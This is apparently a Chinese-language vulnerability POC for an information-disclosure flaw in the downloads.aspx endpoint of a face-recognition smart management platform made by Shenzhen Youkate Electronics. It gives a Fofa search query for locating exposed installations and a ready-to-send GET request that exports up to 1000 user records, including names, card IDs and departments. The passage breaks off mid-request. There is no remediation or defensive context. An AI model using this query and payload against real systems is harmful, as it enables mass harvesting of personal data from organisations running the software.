漏洞描述:
深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台downloads.aspx存在信息泄露漏洞,攻击者可以通过此漏洞获取当前系统用户敏感信息。
搜索语法:
Fofa-Query: body="View/UserReserved/UserReservedTest.aspx"
漏洞详情:
1.脸爱云一脸通智慧管理平台。
2.漏洞POC:
GET /downloads.aspx?Ename=UserInfo&total=1000&jsonParam={%22rybh%22:%22%22,%22ryxm%22:%22%22,%22EngName%22:%22%22,%22groupname%22:%22%22,%22companyname%22:%22%22,%22bmmc%22:%22%22,%22ryzt%22:%22%22,%22rzstartime%22:%22%22,%22rzendtime%22:%22%22,%22lzstartime%22:%22%22,%22lzendtime%22:%22%22,%22zhiwu%22:%22%22,%22cardid%22:%22%22,%22rfzt%22:%22%22,%22klb%22:%22%22,%22sxstartime%22:%22%22,%22sxendtime%22:%22%22,%22khstartime%22:%22%22,%22khendtime%22